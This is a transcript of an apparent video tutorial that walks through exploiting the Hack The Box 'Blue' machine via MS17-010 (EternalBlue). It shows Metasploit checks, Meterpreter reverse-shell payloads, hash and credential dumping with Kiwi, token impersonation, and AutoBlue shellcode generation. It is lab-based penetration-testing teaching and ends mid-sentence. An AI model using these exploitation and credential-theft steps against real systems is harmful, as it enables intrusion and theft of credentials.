1 00:00:00,120 --> 00:00:00,630 Hey there. 2 00:00:00,630 --> 00:00:02,320 You made it to episode three. 3 00:00:02,310 --> 00:00:04,170 Welcome back. 4 00:00:04,170 --> 00:00:10,850 So let's go ahead and hop right in and we're going to go right to the hacked the box Web site. 5 00:00:10,860 --> 00:00:13,700 And let's go ahead and spin up blue. 6 00:00:13,710 --> 00:00:22,800 So we're gonna be working on Blue here and what we're going to be doing is working on this 17 0 1 0. 7 00:00:22,800 --> 00:00:27,080 We're going to talk about that and its importance here in a second. 8 00:00:27,090 --> 00:00:32,850 First and foremost I want you guys to spin up this machine and go ahead and go into your terminal and 9 00:00:32,850 --> 00:00:34,850 start scanning it while we're scanning it. 10 00:00:34,860 --> 00:00:40,860 We can use our common stall tactics and talk about the machine a little bit and then we'll get back 11 00:00:40,860 --> 00:00:42,450 into the actual script. 12 00:00:43,440 --> 00:00:50,190 So as always our scan show looks something like this or whatever your favorite and map or mass scan 13 00:00:50,520 --> 00:00:51,390 is. 14 00:00:51,390 --> 00:00:56,580 And then I'm going to go ahead and type in the IP address which I have already forgotten it is Ten Top 15 00:00:56,610 --> 00:01:00,180 Ten Top Ten dot 40. 16 00:01:00,750 --> 00:01:04,770 OK welcome everyone. 17 00:01:04,780 --> 00:01:05,590 Quick intro. 18 00:01:05,590 --> 00:01:06,220 I know. 19 00:01:06,430 --> 00:01:14,530 So Episode 3 we are going to be covering MH 17 010 a.k.a. Eternal Blue. 20 00:01:14,540 --> 00:01:17,810 Now this is super important. 21 00:01:17,810 --> 00:01:19,180 It's gonna be easy. 22 00:01:19,190 --> 00:01:19,690 We're going. 23 00:01:19,730 --> 00:01:22,940 We're gonna nail this machine several different ways. 24 00:01:22,940 --> 00:01:27,350 We're gonna look at the midas fly away and some of you have been asking for manual ways which I know 25 00:01:27,350 --> 00:01:35,060 why we'll look at the manual method of doing this as well and talk about some precautions how to check 26 00:01:35,060 --> 00:01:36,590 for it as well. 27 00:01:36,950 --> 00:01:43,190 So and there's 17 0 1 0 is a vulnerability that was released a couple of years ago. 28 00:01:43,190 --> 00:01:49,550 The SMB I've been harping on SMB the first couple episodes we're going to harp on SMB at least one more 29 00:01:49,550 --> 00:01:54,460 time here and SMB is just so dangerous right. 30 00:01:54,650 --> 00:01:56,150 And where we're at. 31 00:01:56,150 --> 00:01:57,250 Here is this. 32 00:01:57,250 --> 00:02:01,700 This vulnerability is a couple of years old but it's still very significant. 33 00:02:01,700 --> 00:02:09,170 Now you may have heard of the want to cry vulnerability that used MF 17 0 1 0 as part of its payload 34 00:02:09,440 --> 00:02:14,130 in order to navigate around networks and do ransomware on networks. 35 00:02:14,130 --> 00:02:19,600 So very very disgusting vulnerability very very costly right. 36 00:02:19,640 --> 00:02:20,790 And why. 37 00:02:20,810 --> 00:02:21,980 Why is this critical. 38 00:02:21,980 --> 00:02:29,900 Well you see this on penetration tests all the time especially well definitely internals not as much 39 00:02:29,900 --> 00:02:31,160 on the external side. 40 00:02:31,220 --> 00:02:36,230 You know there showed in and other tools now that people can to search for this and if you still have 41 00:02:36,230 --> 00:02:40,190 this running on your external network chances are you've probably been popped. 42 00:02:40,190 --> 00:02:46,070 But on the internal side see it all the time have explained it multiple times on internal penetration 43 00:02:46,070 --> 00:02:46,970 tests. 44 00:02:46,970 --> 00:02:54,110 In fact the latest time that I have seen it was this past week while doing an internal penetration test. 45 00:02:54,110 --> 00:03:06,890 So this vulnerability while simple is super critical it allows us to have a remote code execution and 46 00:03:06,890 --> 00:03:11,370 gain system access on a machine on top of that. 47 00:03:11,390 --> 00:03:14,670 It's still very very common in networks. 48 00:03:14,690 --> 00:03:21,350 So the reason we're going to cover this is one it's common it's critical you're still going to see it 49 00:03:21,800 --> 00:03:27,960 to its SMB which covers along with the theme that we've been seeing three. 50 00:03:28,070 --> 00:03:29,840 It's still an easy machine right. 51 00:03:29,840 --> 00:03:31,040 We're still newbies. 52 00:03:31,040 --> 00:03:33,330 We're still trying to get through some of the easy stuff. 53 00:03:33,440 --> 00:03:37,490 We got to cover that eases and the basics before we can get into anything else. 54 00:03:37,490 --> 00:03:40,700 So while you might be like wow that was easy. 55 00:03:40,820 --> 00:03:42,740 Sometimes it is this easy. 56 00:03:43,460 --> 00:03:52,480 And for because we only not only get to play the Mets play here but we also get to play with auto blue. 57 00:03:52,520 --> 00:03:54,830 So we'll do it the manual way as well. 58 00:03:55,850 --> 00:03:56,150 OK. 59 00:03:56,150 --> 00:04:01,550 So if we look at this here you can see that we have our scan back. 60 00:04:01,580 --> 00:04:08,000 You come through and you'll start to notice things as you as you see them. 61 00:04:08,250 --> 00:04:14,070 But when I'm looking at a machine and I see SMB right we've got our P.C. which is common to see with 62 00:04:14,100 --> 00:04:16,990 SMB and you got a bunch of RBC ports down here. 63 00:04:17,070 --> 00:04:23,610 We're not going to worry about RBC today we're worried about SMB and we could see that it pulled back 64 00:04:23,610 --> 00:04:25,730 a version of Windows for us. 65 00:04:25,950 --> 00:04:32,920 Now it's Windows 7 professional seventy six or one Service Pack 1 when I see something like this. 66 00:04:33,030 --> 00:04:34,460 Ding ding ding ding ding. 67 00:04:34,620 --> 00:04:37,620 I'm thinking a journal blew right away. 68 00:04:37,620 --> 00:04:38,740 OK. 69 00:04:39,480 --> 00:04:44,290 So that's the first thing I'm probably checking honestly when I see this. 70 00:04:44,300 --> 00:04:47,840 Now we have talked in the past and I'm not going to cover the tools because we covered the last two 71 00:04:47,840 --> 00:04:48,270 times. 72 00:04:48,300 --> 00:04:48,500 Right. 73 00:04:48,500 --> 00:04:51,950 This is just kind of gradually advancing from where we've been. 74 00:04:52,190 --> 00:04:59,010 We could look at this with SMB client and we could say hey SMB client can I connect to four or forty 75 00:04:59,010 --> 00:05:01,020 five And can I get there. 76 00:05:01,020 --> 00:05:03,050 Can I give you the file shares. 77 00:05:03,150 --> 00:05:07,670 We can also run Metis a split on this and see what kind of S&P version is running. 78 00:05:07,740 --> 00:05:13,830 We could also scroll down to the bottom there's always some SMB information down here so you could see 79 00:05:13,830 --> 00:05:16,090 that it's a Windows 7 again down here. 80 00:05:16,100 --> 00:05:17,670 Professional six point one. 81 00:05:17,770 --> 00:05:18,960 A little bit of information. 82 00:05:18,960 --> 00:05:21,360 We've got a P.C. name. 83 00:05:21,360 --> 00:05:28,980 We're going to work groups so we're not in a domain here and we see message signing is disable and then 84 00:05:28,980 --> 00:05:34,310 it says over here it's enabled the now required which is pretty much the same thing as disabled because 85 00:05:35,270 --> 00:05:37,140 you know it's still a vulnerability here. 86 00:05:37,830 --> 00:05:39,480 So we talked about that as well. 87 00:05:39,480 --> 00:05:45,120 And as we get more advanced we'll cover that but this is a more active directory internal pen testing 88 00:05:45,120 --> 00:05:45,450 stuff. 89 00:05:45,450 --> 00:05:48,380 As I mentioned before so. 90 00:05:48,680 --> 00:05:49,570 OK. 91 00:05:49,820 --> 00:05:58,460 We notice you've got SMB we have in the past heard that hey you know a recent exploit is called internal 92 00:05:58,460 --> 00:06:00,690 blue and a 17 0 1 0. 93 00:06:00,710 --> 00:06:05,600 And another thing that I should note is when you're doing hack the box a lot of times like they give 94 00:06:05,600 --> 00:06:06,320 you a hint. 95 00:06:06,500 --> 00:06:07,300 OK. 96 00:06:07,430 --> 00:06:14,180 They give you a hint if you notice some of these if you look through these like devil if you look through 97 00:06:14,250 --> 00:06:15,820 legacies even kind of a hint. 98 00:06:15,830 --> 00:06:22,730 Sunday's a hint active is a hint slightly some of these curling you might have to think hey am I have 99 00:06:22,730 --> 00:06:24,830 to do with curl. 100 00:06:24,830 --> 00:06:32,330 So you know there's always I wouldn't say always but a good amount of the time something in the box 101 00:06:32,390 --> 00:06:36,110 name relates to something you're gonna have to do. 102 00:06:36,240 --> 00:06:38,330 So Blue probably stands out right away. 103 00:06:38,330 --> 00:06:42,830 That's why I'm not like going through the scan and saying hey you know I don't know what it could be. 104 00:06:42,830 --> 00:06:45,640 Let's enumerate this right off the bat. 105 00:06:45,830 --> 00:06:48,530 When you have a 17 010 you have it. 106 00:06:48,560 --> 00:06:48,950 OK. 107 00:06:49,880 --> 00:06:52,100 So we're going to do this two ways. 108 00:06:52,100 --> 00:06:54,830 First way we're going to do is the autopen method. 109 00:06:55,370 --> 00:07:00,270 So let's go with MSF console and let's talk about a couple things here. 110 00:07:00,350 --> 00:07:04,670 Once we load this up say we're doing a real pen test. 111 00:07:04,670 --> 00:07:10,330 First things first we want to confirm that we think it is eternal blue. 112 00:07:10,340 --> 00:07:12,180 We want to make sure that we can see that. 113 00:07:12,530 --> 00:07:20,390 So what we can say is we can say search and 17 0 1 0 something like that. 114 00:07:20,960 --> 00:07:24,590 And there is this auxiliary scanner here. 115 00:07:24,590 --> 00:07:25,390 Right. 116 00:07:25,400 --> 00:07:28,640 We just want to know does Eternal Blue exist. 117 00:07:28,640 --> 00:07:30,610 Do we think it exists. 118 00:07:30,680 --> 00:07:32,120 So that's important first right. 119 00:07:32,120 --> 00:07:38,210 You don't just want to fire and explode without confirming or least having a good hunch that this exists. 120 00:07:38,210 --> 00:07:48,140 Also it should be noted too that I screwed that up SMB and 17 010. 121 00:07:48,140 --> 00:07:51,830 It should also be noted that this exploit can tip a machine over. 122 00:07:52,190 --> 00:07:58,080 So if you're doing it on an internal environment make sure that it's not a significant machine like 123 00:07:58,090 --> 00:07:58,220 it. 124 00:07:58,220 --> 00:07:59,920 This was a domain controller. 125 00:07:59,930 --> 00:08:07,400 You'll probably want to call up you know the the client and say hey I'm about to use an exploit. 126 00:08:07,390 --> 00:08:08,210 Can I use this. 127 00:08:08,210 --> 00:08:10,200 It may tip your machine over. 128 00:08:10,460 --> 00:08:12,590 Are you ready in case that happens. 129 00:08:12,620 --> 00:08:17,400 You know if this is just like a workstation it's iffy. 130 00:08:17,420 --> 00:08:23,010 They kind of maybe expect you being in there but still you don't know who's working on what. 131 00:08:23,010 --> 00:08:24,800 And it would suck to lose all your work as well. 132 00:08:24,830 --> 00:08:28,520 So best practice might be just to call all the time. 133 00:08:29,030 --> 00:08:34,490 So we could say options here and then all we have to do is set and our host. 134 00:08:34,790 --> 00:08:43,460 So the our host that we're going to set is 10 that 10 10 top 40 and then we'll say options and everything 135 00:08:43,460 --> 00:08:45,840 else looks like it is set. 136 00:08:46,700 --> 00:08:49,580 So it's going to check for named pipes here in this exploit. 137 00:08:49,580 --> 00:08:50,880 That's kind of how it works. 138 00:08:50,900 --> 00:08:56,760 Now this is complicated more and more with my head than I'll ever be able to fully understand. 139 00:08:57,680 --> 00:09:01,820 But it has to be able to find a name pipe in order to actually exploit. 140 00:09:01,880 --> 00:09:07,410 So let's go ahead and just run this check here and you'll get this. 141 00:09:07,410 --> 00:09:13,590 It'll say host is likely vulnerable Dems 17 0 1 0 and it pulls back at 64 bit. 142 00:09:13,590 --> 00:09:14,730 Perfect. 143 00:09:14,850 --> 00:09:15,200 OK. 144 00:09:15,420 --> 00:09:21,740 So if we scroll back up a tiny bit there are a few different ones. 145 00:09:21,820 --> 00:09:24,870 There is Emma 17 010 maternal blue. 146 00:09:24,940 --> 00:09:30,490 There is a P.S. exact version and there is Windows 8 here. 147 00:09:30,490 --> 00:09:32,230 So this is for. 148 00:09:33,550 --> 00:09:33,990 What is it. 149 00:09:33,990 --> 00:09:35,260 It's for Windows 7. 150 00:09:35,260 --> 00:09:37,900 And I forget the other operating system. 151 00:09:38,110 --> 00:09:44,870 You can run these on Windows 10 and other servers this is a server twenty two thousand eight. 152 00:09:44,890 --> 00:09:46,680 2012 I remember which one it is. 153 00:09:47,500 --> 00:09:53,680 But you know it's always worth checking especially nowadays if you're running something like NASA's 154 00:09:53,680 --> 00:09:58,470 nest is going to pull up and say Hey we found eternal blue at least we think we do. 155 00:09:58,600 --> 00:10:00,970 Especially like on an internal assessment. 156 00:10:00,970 --> 00:10:07,000 But if you don't have those sorts of tools available to you you could do this sort of check here. 157 00:10:07,000 --> 00:10:14,540 So let's go ahead and just say use and then I'm just gonna paste what I just copied their sorry I'm 158 00:10:14,540 --> 00:10:14,950 clumsy. 159 00:10:14,960 --> 00:10:17,840 If you guys hear some shaking I keep hitting my my microphone. 160 00:10:18,290 --> 00:10:19,270 OK. 161 00:10:19,460 --> 00:10:21,200 Options. 162 00:10:21,200 --> 00:10:24,110 And again all we've got to do is set the our host for this. 163 00:10:25,770 --> 00:10:30,810 So this says two thousand eight R2 and Windows 7. 164 00:10:30,870 --> 00:10:35,970 I used it on other machines I've used it on Windows 10 before it's worked. 165 00:10:36,600 --> 00:10:36,930 OK. 166 00:10:36,930 --> 00:10:43,350 So now we are good and we can use show targets like I've said in the past all there is is one target 167 00:10:43,350 --> 00:10:44,220 here. 168 00:10:44,400 --> 00:10:46,690 So let's run it. 169 00:10:46,750 --> 00:10:50,600 Now this exploit doesn't always work on the first try. 170 00:10:50,620 --> 00:10:52,500 It's kind of a finicky exploit. 171 00:10:52,930 --> 00:11:00,000 So we'll let it run here and see if it actually works and it's it's worked first time. 172 00:11:00,000 --> 00:11:00,570 Awesome. 173 00:11:00,570 --> 00:11:01,480 Great. 174 00:11:01,500 --> 00:11:07,080 So you see we got the win and then might just have to hit enter here and we are on the system. 175 00:11:07,350 --> 00:11:07,820 OK. 176 00:11:08,370 --> 00:11:09,690 So we have a command show. 177 00:11:09,690 --> 00:11:18,780 We could say who am I and we are authority system on the hostname of Harris P.C. not bad. 178 00:11:18,810 --> 00:11:20,220 This is pretty good. 179 00:11:20,280 --> 00:11:22,890 We can improve this I believe. 180 00:11:22,980 --> 00:11:24,880 So let's go ahead and hit. 181 00:11:24,900 --> 00:11:26,900 Yes a board session. 182 00:11:27,180 --> 00:11:30,550 Control C and then abort the session we'll close the shell. 183 00:11:30,560 --> 00:11:33,050 Let's take an options again. 184 00:11:33,090 --> 00:11:39,810 Now you could see that we use a generic reverse shall here see the payload generic for its last shell. 185 00:11:39,810 --> 00:11:41,950 Reverse TTP. 186 00:11:42,000 --> 00:11:49,500 Now this is what we consider an onstage payload a stage payload would have a forward slash here meaning 187 00:11:49,500 --> 00:11:52,320 that it sends this payload in stages. 188 00:11:52,320 --> 00:11:52,610 Right. 189 00:11:52,620 --> 00:11:54,690 So it would say hey. 190 00:11:54,750 --> 00:11:57,850 Stage one stage two stage three. 191 00:11:58,350 --> 00:12:02,940 But because we now have this for its last year we can identify this as an on stage payload meaning that 192 00:12:02,940 --> 00:12:05,320 it sends is all at once. 193 00:12:05,430 --> 00:12:08,990 So there's different different pros and cons to both. 194 00:12:09,000 --> 00:12:13,380 My recommendation is always if you're having trouble getting a shell and you're pretty sure that there's 195 00:12:13,410 --> 00:12:18,540 a and exploit available consider changing this to a stage payload here. 196 00:12:19,070 --> 00:12:21,600 And I'm sure we're going to encounter that as we go further. 197 00:12:21,810 --> 00:12:24,510 But I can show you the differences here as well. 198 00:12:24,510 --> 00:12:33,450 So we can say something like set payload what I want here is I am a a Windows fanboy right. 199 00:12:33,480 --> 00:12:35,610 And this is going to be auto tab. 200 00:12:36,270 --> 00:12:42,300 So Windows X 64 and I said Windows cam where I'm a mature sprit or fanboy so we can say my interpreter 201 00:12:42,990 --> 00:12:46,150 if it's available it is OK. 202 00:12:46,320 --> 00:12:51,510 And then we just say return fritter and this is staged right. 203 00:12:51,510 --> 00:12:54,520 Look at the stages and then reverse TCB. 204 00:12:54,540 --> 00:12:56,050 This is the one we're gonna want. 205 00:12:56,050 --> 00:12:58,150 So let's go ahead and select that first. 206 00:12:58,450 --> 00:13:00,810 And what we're doing here is we're improving our payload. 207 00:13:02,110 --> 00:13:07,200 So we're going from this generic shell and you saw of brought us into it brought us into a command from. 208 00:13:07,300 --> 00:13:10,310 That's OK but we could do better. 209 00:13:10,750 --> 00:13:12,550 So we're going to set this payload here. 210 00:13:12,550 --> 00:13:18,430 Now if we went back and we just said set payload and we did windows X 64 and a double tabbed you can 211 00:13:18,430 --> 00:13:26,320 see there's other stuff besides my interpreter and here they have a shell say look at this buying TCB 212 00:13:26,320 --> 00:13:29,180 or look at this reverse CPC for its last year. 213 00:13:29,230 --> 00:13:31,480 This is a staged payload. 214 00:13:31,480 --> 00:13:32,610 Look at this one here. 215 00:13:32,710 --> 00:13:34,230 This is onstage. 216 00:13:34,270 --> 00:13:36,310 So this sends in multiple stages. 217 00:13:36,310 --> 00:13:38,870 This kind of sends all at once. 218 00:13:39,130 --> 00:13:39,490 OK. 219 00:13:39,520 --> 00:13:41,580 So it's always good to try both. 220 00:13:41,680 --> 00:13:47,440 And if you're struggling say with the interpreter in general going to a generic reverse teepee like 221 00:13:47,440 --> 00:13:52,360 this is always a good option as well just to try out different payloads and make sure that you're not 222 00:13:52,360 --> 00:13:57,330 losing your mind with attacking with the right exploit but not having the right payload. 223 00:13:57,340 --> 00:14:00,010 So payloads are important as well. 224 00:14:00,010 --> 00:14:02,250 So we already have our payload selected. 225 00:14:02,290 --> 00:14:08,030 Let's go ahead and say options and you could see it picks for us our Al hosts. 226 00:14:08,050 --> 00:14:08,800 That's correct. 227 00:14:08,800 --> 00:14:09,760 And our Al part. 228 00:14:09,760 --> 00:14:10,480 That is correct. 229 00:14:10,480 --> 00:14:12,080 That's fine. 230 00:14:12,100 --> 00:14:18,490 We're gonna go ahead and say run now or you could type an exploit if you want to be cool. 231 00:14:18,490 --> 00:14:21,740 You can see the payload option changed up here from the generic as well. 232 00:14:21,760 --> 00:14:29,640 So good to note so we'll let this ride and see if it works it's possible that it doesn't work with this 233 00:14:29,640 --> 00:14:31,350 mature operator. 234 00:14:31,680 --> 00:14:32,950 It could be too much for it. 235 00:14:33,000 --> 00:14:40,560 Maybe that's why we're using generic but hopefully we can improve this shell here in while we're waiting 236 00:14:40,560 --> 00:14:41,540 on this. 237 00:14:41,670 --> 00:14:50,880 What we can do is we can go out to the inter webs and we can hit the plus area get a new tab going. 238 00:14:51,570 --> 00:14:57,310 So we're going to look for is a tool called Auto blue and we'll just type in GitHub. 239 00:14:57,360 --> 00:15:03,840 There's a perfect Google already knows what we want auto blue MH 17 010. 240 00:15:04,500 --> 00:15:11,440 So we're going to try this here and if we go to the get hub we read through it. 241 00:15:11,710 --> 00:15:13,090 It tells you what it is. 242 00:15:13,600 --> 00:15:22,020 So it has a python eternal blue checker here so it'll tell us Hey does this work or not work. 243 00:15:22,070 --> 00:15:27,790 This will also come down and it will allow us to compile shell code similar to what we're doing shall 244 00:15:27,800 --> 00:15:33,110 code will just be the payload that we're using it allow us to compile that and set up a listener with 245 00:15:33,110 --> 00:15:35,840 maternal critter and then we can just post it. 246 00:15:35,840 --> 00:15:37,360 It all makes sense here in a minute. 247 00:15:37,550 --> 00:15:39,630 It's just a little bit more manual the method. 248 00:15:39,680 --> 00:15:42,070 And this one is actually pretty good. 249 00:15:42,170 --> 00:15:48,050 The one in the past when you turned blue first came out was was like it was a little bit more hands 250 00:15:48,050 --> 00:15:49,310 on a little bit more detail. 251 00:15:49,310 --> 00:15:53,690 This one has made it way more comfortable to use and user friendly. 252 00:15:53,690 --> 00:16:00,050 So my advice is if you're looking for an alternative to Mattel operator and this is still going to use 253 00:16:00,050 --> 00:16:02,530 Mattel prettier though you do not have to. 254 00:16:02,570 --> 00:16:07,030 You can see in here it's going to say zero from interpretive shell one for regular command shell. 255 00:16:07,190 --> 00:16:12,760 I always like them interpreter shell just because you get extra I understand their situations. 256 00:16:12,860 --> 00:16:19,310 Certain exams where you can't write in that instance I think it's best still to practice with this and 257 00:16:19,310 --> 00:16:22,270 practice the other way as well and just get comfortable with both. 258 00:16:23,390 --> 00:16:29,680 But if I had the choice on a real world assessment I'm always using interpreter because of the flexibility. 259 00:16:29,750 --> 00:16:31,050 OK so let's go back here. 260 00:16:31,050 --> 00:16:32,840 You see that we've got a shell. 261 00:16:32,900 --> 00:16:34,280 This is perfect. 262 00:16:34,280 --> 00:16:37,030 It failed the first time I told you guys it might fail. 263 00:16:37,100 --> 00:16:40,020 That happens but we've got to win here. 264 00:16:40,160 --> 00:16:45,160 Same thing if you get the UIC we are authority system says info here. 265 00:16:45,710 --> 00:16:45,990 OK. 266 00:16:46,010 --> 00:16:51,490 We've got a return greater 64 bit in architecture 64 bit wonderful. 267 00:16:51,530 --> 00:16:52,240 That's only right. 268 00:16:52,250 --> 00:16:52,580 Right. 269 00:16:52,580 --> 00:16:55,970 Remember from the previous episodes first things first. 270 00:16:56,060 --> 00:16:58,210 Why not dump some hashes. 271 00:16:58,310 --> 00:16:58,610 Right. 272 00:16:58,610 --> 00:17:03,860 So now we can take these hashes and we can try to pass them around the network. 273 00:17:03,860 --> 00:17:11,600 We can try to you know crack them as well with hash cat or John or whatever and see if this gets us 274 00:17:11,630 --> 00:17:15,200 a foothold anywhere else in our network. 275 00:17:15,200 --> 00:17:22,040 We can also dive into the machine and look for valuable information we can look at the routing table. 276 00:17:22,140 --> 00:17:25,640 You know we can go into a shell and we can say like root print. 277 00:17:26,300 --> 00:17:26,530 OK. 278 00:17:26,550 --> 00:17:29,120 What other word is this talk to you know. 279 00:17:29,150 --> 00:17:30,800 And this is it going to talk to anything. 280 00:17:31,070 --> 00:17:37,500 It's not really the best example because there's no dual home machines that I know of at least in in 281 00:17:37,550 --> 00:17:38,810 half the box. 282 00:17:38,810 --> 00:17:43,220 So tend not to end up tend to is its gateway we can look at that. 283 00:17:43,370 --> 00:17:50,660 We can look at our dash a and see what's in the ARP table and what machine that it talks to it's only 284 00:17:50,660 --> 00:17:54,980 going to talk to itself NetSuite at that age you know. 285 00:17:55,820 --> 00:18:01,040 So if you're not familiar with these commands again I know I mentioned them before but it's important 286 00:18:01,040 --> 00:18:05,450 to learn some of these common networking commands and what we're trying to do a network that's going 287 00:18:05,450 --> 00:18:08,150 to show what ports are open and what ports we're talking to. 288 00:18:08,180 --> 00:18:13,580 You can see that are we're have a close wait on our last shell here and then we open up a new port. 289 00:18:14,090 --> 00:18:23,720 And this is us communicating here on PDA of 10 68 and we can come back if you're curious about how that 290 00:18:23,720 --> 00:18:32,220 works if we look for 10 68 OK this is apparently what we came in on this spool SUV SUV. 291 00:18:33,430 --> 00:18:40,190 You can kind of look around and gain some information about you know the forensic side of things as 292 00:18:40,190 --> 00:18:41,190 well. 293 00:18:41,210 --> 00:18:48,010 I'm no good at forensics but it's always it's always interesting to look at these these PPD and the 294 00:18:48,040 --> 00:18:55,130 p i d see the parent and the BD to see you know like OK where do we come in come in and do we see any 295 00:18:55,130 --> 00:18:57,060 kind of information here. 296 00:18:57,080 --> 00:19:01,190 This is also good for Migration which we'll talk about at a later time when we have to do it. 297 00:19:01,430 --> 00:19:05,510 As of now we haven't had to migrate that's a little bit of a later lesson. 298 00:19:05,510 --> 00:19:08,440 So we've gathered hashes we can gather network information. 299 00:19:08,450 --> 00:19:11,480 We can go look at files in the file system. 300 00:19:11,480 --> 00:19:17,510 Of course you know you can go and dump your hashes so your hashes are gonna be in the administrator 301 00:19:17,510 --> 00:19:19,520 folder for the root hash. 302 00:19:19,550 --> 00:19:23,270 And the user folder for the user hash and I won't try to do that. 303 00:19:23,300 --> 00:19:25,730 Somebody showed you a couple of times now. 304 00:19:25,730 --> 00:19:36,110 So this is the this is the method for the automated Meadows blight and we can also say like there's 305 00:19:36,110 --> 00:19:41,630 load commands so I'm not sure if I've shown you guys these before but we can load something like kiwi 306 00:19:42,800 --> 00:19:47,990 and Kiwi will do we can say help and we could do like a creds all done. 307 00:19:48,200 --> 00:19:50,180 And try to dump all the credentials that we can. 308 00:19:50,180 --> 00:19:51,130 Nothing came back here. 309 00:19:51,140 --> 00:19:57,110 That's OK but it's cool we can dump curb Rose we could dump the W digests and you'll have to know what 310 00:19:57,110 --> 00:19:58,670 any of this is right now. 311 00:19:58,790 --> 00:20:01,890 I just know that we have a lot of power with maternal printer. 312 00:20:02,090 --> 00:20:04,210 We can dump the Wi-Fi list. 313 00:20:04,580 --> 00:20:10,960 The Wi-Fi shared list here we can change passwords can dump the Sam right. 314 00:20:11,410 --> 00:20:13,620 Would seek LSA dump Sam. 315 00:20:14,440 --> 00:20:14,730 OK. 316 00:20:14,730 --> 00:20:17,260 There's the Sam that we just saw with the hash dump. 317 00:20:17,450 --> 00:20:20,190 We could dump secrets right. 318 00:20:20,490 --> 00:20:25,150 So there is a lot going on here. 319 00:20:25,370 --> 00:20:29,320 You know Incognito is another great tool but I'm not going to get into. 320 00:20:29,350 --> 00:20:37,400 But we can look at for example we can say list tokens for users and then we can impersonate a user if 321 00:20:37,400 --> 00:20:40,750 there's one of value here way advanced topic. 322 00:20:40,760 --> 00:20:46,610 I'm just trying to show you the flexibility that we have here and really hammer down That like my interpreter 323 00:20:46,610 --> 00:20:53,750 is is very very flexible on top of that which we're not going to get into today either is my preference 324 00:20:53,760 --> 00:21:00,620 is a bunch of post exploitation commands and you're going to see one in an upcoming video on running 325 00:21:00,620 --> 00:21:02,320 a post exploit suggests. 326 00:21:02,450 --> 00:21:06,770 So when we get to that you'll get to see the post the post commands and how they work as well. 327 00:21:06,800 --> 00:21:10,020 So we'll focus those at a later time. 328 00:21:10,070 --> 00:21:16,070 So let's go ahead and I'm going to exit out of all of this and I'm going to exit here too and let's 329 00:21:16,070 --> 00:21:23,630 go download this this get Hub Repository here so we get click on this clone download and just copy this 330 00:21:23,630 --> 00:21:31,210 link we can go back in and what I want to do is I'm going to change directory to my app folder that's 331 00:21:31,210 --> 00:21:38,260 why I like to put my files or my programs and if you don't have get I don't know if it comes pre installed 332 00:21:38,680 --> 00:21:47,860 app install get like that we'll get you what we're about to use so get clone and then we're gonna paste 333 00:21:47,860 --> 00:22:02,610 this in here and then we are going to say seedy to RW alas and it looks like it's all ready for us so 334 00:22:02,610 --> 00:22:11,050 if we go back into the instructions come down here now it's gotten an eternal blue checkered pie and 335 00:22:11,050 --> 00:22:14,270 if we look we've got the eternal blue checker right here. 336 00:22:14,380 --> 00:22:22,340 So let's run Python against that and we'll just say 10 not 10 not ten that 40 similar to the instructions 337 00:22:22,340 --> 00:22:30,370 that told us to run with an IP address hit enter and it says the target is not patched. 338 00:22:31,270 --> 00:22:34,570 OK so that means that it's likely vulnerable. 339 00:22:34,570 --> 00:22:40,990 This is telling us this is another way when I want to use something on an assessment to prove say that 340 00:22:40,990 --> 00:22:47,650 I ran the exploit the exploit is not working but I have a good feeling that the exploit is there the 341 00:22:47,650 --> 00:22:48,590 vulnerabilities there. 342 00:22:48,600 --> 00:22:54,570 There are times where MF 17 is there you cannot exploit it without a valid user. 343 00:22:54,730 --> 00:22:56,830 There's times where you have no pipes. 344 00:22:56,830 --> 00:22:58,990 This says is testing the name pipes. 345 00:22:58,990 --> 00:23:02,070 There are more pipes than this and that's what maturity are found. 346 00:23:02,260 --> 00:23:07,180 But there are times where you have to have a user a user of any kind doesn't have to be ad name but 347 00:23:07,180 --> 00:23:09,620 just a user of any kind. 348 00:23:10,480 --> 00:23:12,550 And it will allow us to get a shell in this machine. 349 00:23:13,960 --> 00:23:15,010 So this is good. 350 00:23:15,010 --> 00:23:18,350 This is another way to check you saw how to check with medicinally. 351 00:23:18,350 --> 00:23:21,150 Now you can see how to check with this tool as well. 352 00:23:21,520 --> 00:23:27,930 And what we can do here is we can follow the instructions now on how to actually generate this. 353 00:23:27,970 --> 00:23:30,130 So we're going to navigate to the shell code folder. 354 00:23:30,130 --> 00:23:33,910 We're going to generate some shell code and all this is is the payload. 355 00:23:33,910 --> 00:23:34,120 Right. 356 00:23:34,120 --> 00:23:39,340 The payloads that you were seeing just a minute ago the interpreter payload the generic payloads all 357 00:23:39,340 --> 00:23:42,460 we're doing is generating this a little bit manually. 358 00:23:42,460 --> 00:23:46,430 This is actually going to do it for us which is super nice super friendly. 359 00:23:46,600 --> 00:23:56,530 So we're going to run the shell prep SDH and it's going to say do you want to generate a reverse shell 360 00:23:56,530 --> 00:23:57,890 with MSF venom. 361 00:23:57,910 --> 00:23:58,910 We'll say Yeah why not. 362 00:23:59,770 --> 00:24:01,150 And then what's our Al host. 363 00:24:01,210 --> 00:24:01,780 That's us. 364 00:24:01,780 --> 00:24:03,070 What's the listening host. 365 00:24:03,520 --> 00:24:06,380 So let's go to a new tab and I'll blow this up. 366 00:24:06,410 --> 00:24:14,010 We'll say I have config or IPA if you like the new new version of doing it 10 not 10 to 14. 367 00:24:14,030 --> 00:24:15,250 Twenty four for me. 368 00:24:17,350 --> 00:24:18,250 OK. 369 00:24:18,560 --> 00:24:20,390 What's the part you wanna listen in on. 370 00:24:20,390 --> 00:24:22,990 We'll say four four four five. 371 00:24:23,210 --> 00:24:28,340 Just to be different and then four x eighty six we need a different one. 372 00:24:28,490 --> 00:24:30,350 Not that this is gonna be x 86. 373 00:24:30,350 --> 00:24:33,630 We already know it's X 64 but that's fine. 374 00:24:33,650 --> 00:24:37,580 So now do we want to generate an interpreter shell or do we want to generate a rig or command shell 375 00:24:37,610 --> 00:24:43,370 if we're going completely manual will generate a command shell but just for simplicity's sake I'm going 376 00:24:43,370 --> 00:24:49,410 to generate an interpreter shell and we want to be staged or stage lists. 377 00:24:49,520 --> 00:24:55,100 We'll try with stage first and if not we'll try with stage was afterwards but we try to stage payload 378 00:24:55,130 --> 00:24:57,370 and it worked so well. 379 00:24:57,410 --> 00:24:59,660 We'll do that again here and see if we can get it to work. 380 00:25:00,320 --> 00:25:05,030 And you can see the commands is running so it's running MSF venom which is a payload generator. 381 00:25:05,120 --> 00:25:08,600 We're going to get into that in a later episode as well on how to generate payloads. 382 00:25:08,600 --> 00:25:13,310 Actually I think the next episode's going to cover that and you can see it's just generating a payload 383 00:25:13,310 --> 00:25:14,600 for the X sixty four. 384 00:25:14,600 --> 00:25:19,700 You see the 64 band here that it has and it's generating one for the x eighty six as well. 385 00:25:19,700 --> 00:25:23,180 So 64 bit and 32 bit different ports. 386 00:25:23,180 --> 